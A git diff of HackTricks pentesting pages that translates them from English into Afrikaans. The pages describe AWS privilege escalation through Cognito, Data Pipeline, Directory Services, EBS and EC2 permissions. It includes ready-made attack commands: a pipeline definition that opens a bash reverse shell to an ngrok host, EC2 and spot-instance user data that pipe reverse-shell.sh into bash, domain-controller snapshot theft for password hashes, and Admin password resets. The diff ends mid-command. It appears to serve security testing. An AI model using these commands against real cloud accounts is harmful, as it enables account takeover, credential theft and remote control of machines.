+**PotensiĂ«le Impak:** PotensiĂ«le indirekte privesc in die onderliggende toepassing wat Cognito User Pool gebruik wat voorregte gee gebaseer op gebruikersattributen. ### `cognito-idp:CreateUserPoolClient` | `cognito-idp:UpdateUserPoolClient` -An attacker with this permission could **create a new User Pool Client less restricted** than already existing pool clients. For example, the new client could allow any kind of method to authenticate, don't have any secret, have token revocation disabled, allow tokens to be valid for a longer period... +'n Aanvaller met hierdie toestemming kan **'n nuwe User Pool Client minder beperk** as reeds bestaande pool kliĂ«nte skep. Byvoorbeeld, die nuwe kliĂ«nt kan enige soort metode toelaat om te autentiseer, geen geheim hĂȘ nie, token herroeping gedeaktiveer hĂȘ, tokens toelaat om vir 'n langer tydperk geldig te wees... -The same can be be don if instead of creating a new client, an **existing one is modified**. - -In the [**command line**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (or the [**update one**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) you can see all the options, check it!. +Diezelfde kan gedoen word as daar in plaas van om 'n nuwe kliĂ«nt te skep, 'n **bestaande een gewysig** word. +In die [**opdraglyn**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/create-user-pool-client.html) (of die [**opdateer een**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool-client.html)) kan jy al die opsies sien, kyk daarna! ```bash aws cognito-idp create-user-pool-client \ - --user-pool-id \ - --client-name \ - [...] +--user-pool-id \ +--client-name \ +[...] 
``` - -**Potential Impact:** Potential indirect privesc to the Identity Pool authorized user used by the User Pool by creating a new client that relax the security measures and makes possible to an attacker to login with a user he was able to create. +**PotensiĂ«le Impak:** PotensiĂ«le indirekte privesc na die Identiteitspoel gemagtigde gebruiker wat deur die Gebruikerspoel gebruik word deur 'n nuwe kliĂ«nt te skep wat die sekuriteitsmaatreĂ«ls verslap en dit moontlik maak vir 'n aanvaller om in te log met 'n gebruiker wat hy kon skep. ### `cognito-idp:CreateUserImportJob` | `cognito-idp:StartUserImportJob` -An attacker could abuse this permission to create users y uploading a csv with new users. - +'n Aanvaller kan hierdie toestemming misbruik om gebruikers te skep deur 'n csv met nuwe gebruikers op te laai. ```bash # Create a new import job aws cognito-idp create-user-import-job \ - --job-name \ - --user-pool-id \ - --cloud-watch-logs-role-arn +--job-name \ +--user-pool-id \ +--cloud-watch-logs-role-arn # Use a new import job aws cognito-idp start-user-import-job \ - --user-pool-id \ - --job-id +--user-pool-id \ +--job-id # Both options before will give you a URL where you can send the CVS file with the users to create curl -v -T "PATH_TO_CSV_FILE" \ - -H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL" +-H "x-amz-server-side-encryption:aws:kms" "PRE_SIGNED_URL" ``` +(In die geval waar jy 'n nuwe invoer werk skep, mag jy ook die iam passrole toestemming nodig hĂȘ, ek het dit nog nie getoets nie). -(In the case where you create a new import job you might also need the iam passrole permission, I haven't tested it yet). - -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user. +**PotensiĂ«le Impak:** Direkte privesc na die identiteitspoel IAM rol vir geverifieerde gebruikers. 
Indirekte privesc na ander app funksies wat in staat is om enige gebruiker te skep. ### `cognito-idp:CreateIdentityProvider` | `cognito-idp:UpdateIdentityProvider` -An attacker could create a new identity provider to then be able to **login through this provider**. - +'n Aanvaller kan 'n nuwe identiteitsverskaffer skep om dan in staat te wees om **deur hierdie verskaffer aan te meld**. ```bash aws cognito-idp create-identity-provider \ - --user-pool-id \ - --provider-name \ - --provider-type \ - --provider-details \ - [--attribute-mapping ] \ - [--idp-identifiers ] +--user-pool-id \ +--provider-name \ +--provider-type \ +--provider-details \ +[--attribute-mapping ] \ +[--idp-identifiers ] ``` +**PotensiĂ«le Impak:** Direkte privesc na die identiteitspoel IAM-rol vir geverifieerde gebruikers. Indirekte privesc na ander app-funksies wat in staat is om enige gebruiker te skep. -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user. +### cognito-sync:\* Analise -### cognito-sync:\* Analysis +Dit is 'n baie algemene toestemming standaard in rolle van Cognito Identiteitspoele. Alhoewel 'n wildcard in 'n toestemmings altyd sleg lyk (veral afkomstig van AWS), is die **gegewe toestemmings nie super nuttig vanuit 'n aanvaller se perspektief nie**. -This is a very common permission by default in roles of Cognito Identity Pools. Even if a wildcard in a permissions always looks bad (specially coming from AWS), the **given permissions aren't super useful from an attackers perspective**. +Hierdie toestemming laat toe om gebruikersinligting van Identiteitspoele en Identiteits-ID's binne Identiteitspoele te lees (wat nie sensitiewe inligting is nie).\ +Identiteits-ID's mag [**Datasette**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) toegeken hĂȘ, wat inligting van die sessies is (AWS definieer dit as 'n **gespeelde speletjie**). 
Dit mag moontlik wees dat dit 'n soort sensitiewe inligting bevat (maar die waarskynlikheid is redelik laag). Jy kan in die [**enumerasiepunt**](../aws-services/aws-cognito-enum/) vind hoe om toegang tot hierdie inligting te verkry. -This permission allows to read use information of Identity Pools and Identity IDs inside Identity Pools (which isn't sensitive info).\ -Identity IDs might have [**Datasets**](https://docs.aws.amazon.com/cognitosync/latest/APIReference/API_Dataset.html) assigned to them, which are information of the sessions (AWS define it like a **saved game**). It might be possible that this contain some kind of sensitive information (but the probability is pretty low). You can find in the [**enumeration page**](../aws-services/aws-cognito-enum/) how to access this information. +'n Aanvaller kan ook hierdie toestemmings gebruik om **homself in te skryf op 'n Cognito-stroom wat veranderinge publiseer** op hierdie datasette of 'n **lambda wat geaktiveer word op cognito-gebeurtenisse**. Ek het nie gesien dat dit gebruik word nie, en ek sou nie sensitiewe inligting hier verwag nie, maar dit is nie onmoontlik nie. -An attacker could also use these permissions to **enroll himself to a Cognito stream that publish changes** on these datases or a **lambda that triggers on cognito events**. I haven't seen this being used, and I wouldn't expect sensitive information here, but it isn't impossible. 
+### Outomatiese Gereedskap -### Automatic Tools +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), die AWS-uitbuitingsraamwerk, sluit nou die "cognito\_\_enum" en "cognito\_\_attack" modules in wat die enumerasie van alle Cognito-bates in 'n rekening outomatiseer en swak konfigurasies, gebruikersattributen wat vir toegangbeheer gebruik word, ens., merk, en ook die skepping van gebruikers outomatiseer (insluitend MFA-ondersteuning) en privilige-eskalasie gebaseer op aanpasbare pasgemaakte attributen, bruikbare identiteitspoel akkrediteer, aanneembare rolle in id tokens, ens. -- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +Vir 'n beskrywing van die modules se funksies, sien deel 2 van die [blogpos](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Vir installasie-instruksies, sien die hoof [Pacu](https://github.com/RhinoSecurityLabs/pacu) bladsy. -For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. 
- -#### Usage - -Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: +#### Gebruik +Voorbeeld van cognito\_\_attack gebruik om te probeer om 'n gebruiker te skep en alle privesc vektore teen 'n gegewe identiteitspoel en gebruikerspoel kliĂ«nt: ```bash Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` - -Sample cognito\_\_enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account: - +Voorbeeld cognito\_\_enum gebruik om al die gebruikerspoele, gebruikerspoel kliĂ«nte, identiteitspoele, gebruikers, ens. wat sigbaar is in die huidige AWS-rekening, te versamel: ```bash Pacu (new:test) > run cognito__enum ``` +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is 'n CLI-gereedskap in python wat verskillende aanvalle op Cognito implementeer, insluitend 'n privesc-escalasie. -- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation. - -#### Installation - +#### Installasie ```bash $ pip install cognito-scanner ``` - -#### Usage - +#### Gebruik ```bash $ cognito-scanner --help ``` - -For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) +Vir meer inligting, kyk na [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md index 82c82682e..5c780098e 100644 
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md @@ -4,7 +4,7 @@ ## datapipeline -For more info about datapipeline check: +Vir meer inligting oor datapipeline, kyk: {{#ref}} ../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md 
@@ -12,67 +12,57 @@ For more info about datapipeline check: ### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` -Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** - +Gebruikers met hierdie **toestemmings kan voorregte verhoog deur 'n Data Pipeline te skep** om arbitrĂȘre opdragte uit te voer met behulp van die **toestemmings van die toegewyde rol:** ```bash aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string ``` - -After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: - +Na die skep van die pyplyn, werk die aanvaller sy definisie by om spesifieke aksies of hulpbron skeppings te bepaal: ```json { - "objects": [ - { - "id": "CreateDirectory", - "type": "ShellCommandActivity", - "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", - "runsOn": { "ref": "instance" } - }, - { - "id": "Default", - "scheduleType": "ondemand", - "failureAndRerunMode": "CASCADE", - "name": "Default", - "role": "assumable_datapipeline", - "resourceRole": "assumable_datapipeline" - }, - { - "id": "instance", - "name": "instance", - "type": "Ec2Resource", - "actionOnTaskFailure": "terminate", - "actionOnResourceFailure": "retryAll", - "maximumRetries": "1", - "instanceType": "t2.micro", - "securityGroups": ["default"], - "role": "assumable_datapipeline", - "resourceRole": "assumable_ec2_profile_instance" - } - ] +"objects": [ +{ +"id": "CreateDirectory", +"type": "ShellCommandActivity", +"command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", +"runsOn": { "ref": "instance" } +}, +{ +"id": "Default", +"scheduleType": "ondemand", +"failureAndRerunMode": "CASCADE", +"name": "Default", +"role": "assumable_datapipeline", +"resourceRole": "assumable_datapipeline" +}, +{ +"id": "instance", +"name": "instance", 
+"type": "Ec2Resource", +"actionOnTaskFailure": "terminate", +"actionOnResourceFailure": "retryAll", +"maximumRetries": "1", +"instanceType": "t2.micro", +"securityGroups": ["default"], +"role": "assumable_datapipeline", +"resourceRole": "assumable_ec2_profile_instance" +} +] } ``` - > [!NOTE] -> Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. +> Let daarop dat die **rol** in **lyn 14, 15 en 27** 'n rol moet wees wat **assumable is deur datapipeline.amazonaws.com** en die rol in **lyn 28** moet 'n **rol wees wat assumable is deur ec2.amazonaws.com met 'n EC2-profiel instansie**. > -> Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). - +> Boonop sal die EC2-instansie slegs toegang hĂȘ tot die rol wat assumable is deur die EC2-instansie (so jy kan net daardie een steel). ```bash aws datapipeline put-pipeline-definition --pipeline-id \ - --pipeline-definition file:///pipeline/definition.json +--pipeline-definition file:///pipeline/definition.json ``` +Die **pypelyn-definisie-lĂȘer, saamgestel deur die aanvaller, sluit opdragte in om opdragte uit te voer** of hulpbronne te skep via die AWS API, wat die Data Pipeline se roltoestemmings benut om moontlik bykomende voorregte te verkry. -The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. +**PotensiĂ«le Impak:** Direkte privesc na die ec2 diensrol wat gespesifiseer is. -**Potential Impact:** Direct privesc to the ec2 service role specified. 
- -## References +## Verwysings - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md index ce24095ed..794cda193 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md @@ -4,7 +4,7 @@ ## Directory Services -For more info about directory services check: +Vir meer inligting oor directory services, kyk: {{#ref}} ../aws-services/aws-directory-services-workdocs-enum.md @@ -12,27 +12,21 @@ For more info about directory services check: ### `ds:ResetUserPassword` -This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ -By default, the only existent user is **Admin**. - +Hierdie toestemming laat toe om die **wagwoord** van enige **bestaande** gebruiker in die Active Directory te **verander**.\ +Standaard is die enigste bestaande gebruiker **Admin**. ``` aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. ``` - ### AWS Management Console -It's possible to enable an **application access URL** that users from AD can access to login: +Dit is moontlik om 'n **toepassingstoegang URL** in te skakel wat gebruikers van AD kan gebruik om aan te meld:
-And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: +En dan **hulle 'n AWS IAM rol te gee** vir wanneer hulle aanmeld, op hierdie manier sal 'n AD gebruiker/groep toegang hĂȘ tot die AWS bestuurskonsol:
-There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission +Daar is blykbaar geen manier om die toepassingstoegang URL, die AWS Bestuurskonsol en toestemming te aktiveer nie. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md index b4af46712..112d93acb 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md @@ -4,7 +4,7 @@ ## dynamodb -For more info about dynamodb check: +Vir meer inligting oor dynamodb, kyk: {{#ref}} ../aws-services/aws-dynamodb-enum.md @@ -12,16 +12,12 @@ For more info about dynamodb check: ### Post Exploitation -As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: +Soos ek weet, is daar **geen direkte manier om voorregte in AWS te verhoog net deur 'n paar AWS `dynamodb` toestemmings te hĂȘ**. Jy kan **sensitiewe** inligting uit die tabelle lees (wat AWS geloofsbriewe kan bevat) en **inligting op die tabelle skryf** (wat ander kwesbaarhede kan aktiveer, soos lambda kode-inspuitings...) maar al hierdie opsies word reeds oorweeg in die **DynamoDB Post Exploitation bladsy**: {{#ref}} ../aws-post-exploitation/aws-dynamodb-post-exploitation.md {{#endref}} -### TODO: Read data abusing data Streams +### TODO: Lees data deur data Streams te misbruik {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md index 36ea3bc53..e2521ee5e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md 
@@ -6,26 +6,22 @@ ### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots` -An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in: +'n Aanvaller met hierdie sal potensieel in staat wees om **volumesnapshots plaaslik af te laai en te analiseer** en sensitiewe inligting daarin te soek (soos geheime of bronkode). Vind uit hoe om dit te doen in: {{#ref}} ../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md {{#endref}} -Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` +Ander toestemmings kan ook nuttig wees soos: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags` -The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**. +Die hulpmiddel [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) voer hierdie aanval uit om **wachtwoorde van 'n domeinbeheerder te onttrek**. -**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords). +**PotensiĂ«le Impak:** Indirekte privesc deur sensitiewe inligting in die snapshot te lokaliseer (jy kan selfs Active Directory-wachtwoorde kry). ### **`ec2:CreateSnapshot`** -Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project. 
+Enige AWS-gebruiker wat die **`EC2:CreateSnapshot`** toestemming besit, kan die hashes van alle domein gebruikers steel deur 'n **snapshot van die Domeinbeheerder** te skep, dit aan 'n instansie wat hulle beheer te koppel en die **NTDS.dit en SYSTEM** registerhive-lĂȘer te eksporteer vir gebruik met Impacket se secretsdump-projek. -You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot. +Jy kan hierdie hulpmiddel gebruik om die aanval te outomatiseer: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) of jy kan een van die vorige tegnieke gebruik nadat jy 'n snapshot geskep het. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md index ad31bde00..9b1911c18 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -4,7 +4,7 @@ ## EC2 -For more **info about EC2** check: +Vir meer **inligting oor EC2** kyk: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ 
@@ -12,51 +12,46 @@ For more **info about EC2** check: ### `iam:PassRole`, `ec2:RunInstances` -An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint. +'n Aanvaller kan **'n instansie skep wat 'n IAM rol aanheg en dan toegang tot die instansie verkry** om die IAM rol geloofsbriewe van die metadata eindpunt te steel. -- **Access via SSH** - -Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`). +- **Toegang via SSH** +Voer 'n nuwe instansie uit met 'n **geskepte** **ssh sleutel** (`--key-name`) en ssh dan daarin (as jy 'n nuwe een wil skep, mag jy die toestemming `ec2:CreateKeyPair` nodig hĂȘ). ```bash aws ec2 run-instances --image-id --instance-type t2.micro \ - --iam-instance-profile Name= --key-name \ - --security-group-ids +--iam-instance-profile Name= --key-name \ +--security-group-ids ``` +- **Toegang via rev shell in gebruikersdata** -- **Access via rev shell in user data** - -You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way. - +Jy kan 'n nuwe instansie gebruik deur 'n **gebruikersdata** (`--user-data`) wat vir jou 'n **rev shell** sal stuur. Jy hoef nie 'n sekuriteitsgroep op hierdie manier te spesifiseer nie. 
```bash echo '#!/bin/bash curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh aws ec2 run-instances --image-id --instance-type t2.micro \ - --iam-instance-profile Name=E \ - --count 1 \ - --user-data "file:///tmp/rev.sh" +--iam-instance-profile Name=E \ +--count 1 \ +--user-data "file:///tmp/rev.sh" ``` - -Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance: +Wees versigtig met GuradDuty as jy die akrediteerings van die IAM-rol buite die instansie gebruik: {{#ref}} ../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md {{#endref}} -**Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles. +**PotensiĂ«le Impak:** Direkte privesc na enige EC2-rol wat aan bestaande instansieprofiele geheg is. -#### Privesc to ECS - -With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**. +#### Privesc na ECS +Met hierdie stel toestemmings kan jy ook **'n EC2-instansie skep en dit binne 'n ECS-kluster registreer**. Op hierdie manier sal ECS **dienste** **uitgevoer** word in die **EC2-instansie** waartoe jy toegang het en dan kan jy daardie dienste (docker houers) penetreer en **hulle ECS-rolle wat geheg is** steel. 
```bash aws ec2 run-instances \ - --image-id ami-07fde2ae86109a2af \ - --instance-type t2.micro \ - --iam-instance-profile \ - --count 1 --key-name pwned \ - --user-data "file:///tmp/asd.sh" +--image-id ami-07fde2ae86109a2af \ +--instance-type t2.micro \ +--iam-instance-profile \ +--count 1 --key-name pwned \ +--user-data "file:///tmp/asd.sh" # Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs) # The EC2 instance profile needs basic ECS access 
@@ -64,22 +59,20 @@ aws ec2 run-instances \ #!/bin/bash echo ECS_CLUSTER= >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config; ``` - -To learn how to **force ECS services to be run** in this new EC2 instance check: +Om te leer hoe om **ECS-dienste te dwing om** in hierdie nuwe EC2-instantie te loop, kyk: {{#ref}} aws-ecs-privesc.md {{#endref}} -If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack. +As jy **nie 'n nuwe instansie kan skep nie** maar die toestemming `ecs:RegisterContainerInstance` het, kan jy dalk die instansie binne die kluster registreer en die kommentaar-aanval uitvoer. -**Potential Impact:** Direct privesc to ECS roles attached to tasks. +**PotensiĂ«le Impak:** Direkte privesc na ECS-rolle wat aan take geheg is. ### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`** -Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\ -As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**. - +Soos in die vorige scenario, kan 'n aanvaller met hierdie toestemmings die **IAM-rol van 'n gecompromitteerde instansie verander** sodat hy nuwe akrediteerbare kan steel.\ +Aangesien 'n instansieprofiel slegs 1 rol kan hĂȘ, as die instansieprofiel **reeds 'n rol het** (gewone geval), sal jy ook **`iam:RemoveRoleFromInstanceProfile`** benodig. ```bash # Removing role from instance profile aws iam remove-role-from-instance-profile --instance-profile-name --role-name 
@@ -87,60 +80,50 @@ aws iam remove-role-from-instance-profile --instance-profile-name --role- # Add role to instance profile aws iam add-role-to-instance-profile --instance-profile-name --role-name ``` +As die **instansprofiel 'n rol het** en die aanvaller **dit nie kan verwyder nie**, is daar 'n ander omweg. Hy kan **vind** 'n **instansprofiel sonder 'n rol** of **nuwe een skep** (`iam:CreateInstanceProfile`), **voeg** die **rol** by daardie **instansprofiel** (soos voorheen bespreek), en **koppel die instansprofiel** wat gecompromitteer is aan 'n gecompromitteerde i**nstans:** -If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:** - -- If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* - +- As die instans **nie enige instans** profiele het nie (`ec2:AssociateIamInstanceProfile`) \* ```bash aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` - -**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). +**PotensiĂ«le Impak:** Direkte privesc na 'n ander EC2-rol (jy moet 'n AWS EC2-instantie gekompromitteer het en 'n paar ekstra toestemmings of spesifieke instansieprofielstatus hĂȘ). 
### **`iam:PassRole`((** `ec2:AssociateIamInstanceProfile`& `ec2:DisassociateIamInstanceProfile`) || `ec2:ReplaceIamInstanceProfileAssociation`) -With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it. - -- If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* +Met hierdie toestemmings is dit moontlik om die instansieprofiel wat aan 'n instansie gekoppel is, te verander, so as die aanval reeds toegang tot 'n instansie gehad het, sal hy in staat wees om akrediteer te steel vir meer instansieprofielrolle deur die een wat daarmee gekoppel is, te verander. +- As dit **'n instansieprofiel het**, kan jy die instansieprofiel **verwyder** (`ec2:DisassociateIamInstanceProfile`) en dit **koppel** \* ```bash aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da aws ec2 disassociate-iam-instance-profile --association-id aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` - -- or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* - +- of **vervang** die **instansprofiel** van die gecompromitteerde instansie (`ec2:ReplaceIamInstanceProfileAssociation`). \* ```` ```bash -aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id +aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id ``` ```` - -**Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). 
+**PotensiĂ«le Impak:** Direkte privesc na 'n ander EC2-rol (jy moet 'n AWS EC2-instantie gekompromitteer het en 'n paar ekstra toestemmings of spesifieke instansieprofielstatus hĂȘ). ### `ec2:RequestSpotInstances`,`iam:PassRole` -An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\ -Once the instance is run, he can **steal the IAM role**. - +'n Aanvaller met die toestemmings **`ec2:RequestSpotInstances`en`iam:PassRole`** kan **versoek** 'n **Spot Instantie** met 'n **EC2-rol aangeheg** en 'n **rev shell** in die **gebruikersdata**.\ +Sodra die instansie gedraai word, kan hy die **IAM-rol** **steel**. ```bash REV=$(printf '#!/bin/bash curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash ' | base64) aws ec2 request-spot-instances \ - --instance-count 1 \ - --launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}" +--instance-count 1 \ +--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}" ``` - ### `ec2:ModifyInstanceAttribute` -An attacker with the **`ec2:ModifyInstanceAttribute`** can modify the instances attributes. Among them, he can **change the user data**, which implies that he can make the instance **run arbitrary data.** Which can be used to get a **rev shell to the EC2 instance**. - -Note that the attributes can only be **modified while the instance is stopped**, so the **permissions** **`ec2:StopInstances`** and **`ec2:StartInstances`**. +'n Aanvaller met die **`ec2:ModifyInstanceAttribute`** kan die instansies se eienskappe verander. 
Onder hulle kan hy **die gebruikersdata verander**, wat impliseer dat hy die instansie kan **arbitraire data laat loop.** Dit kan gebruik word om 'n **rev shell na die EC2 instansie** te kry. +Let daarop dat die eienskappe slegs **gewysig kan word terwyl die instansie gestop is**, so die **toestemmings** **`ec2:StopInstances`** en **`ec2:StartInstances`**. ```bash TEXT='Content-Type: multipart/mixed; boundary="//" MIME-Version: 1.0 
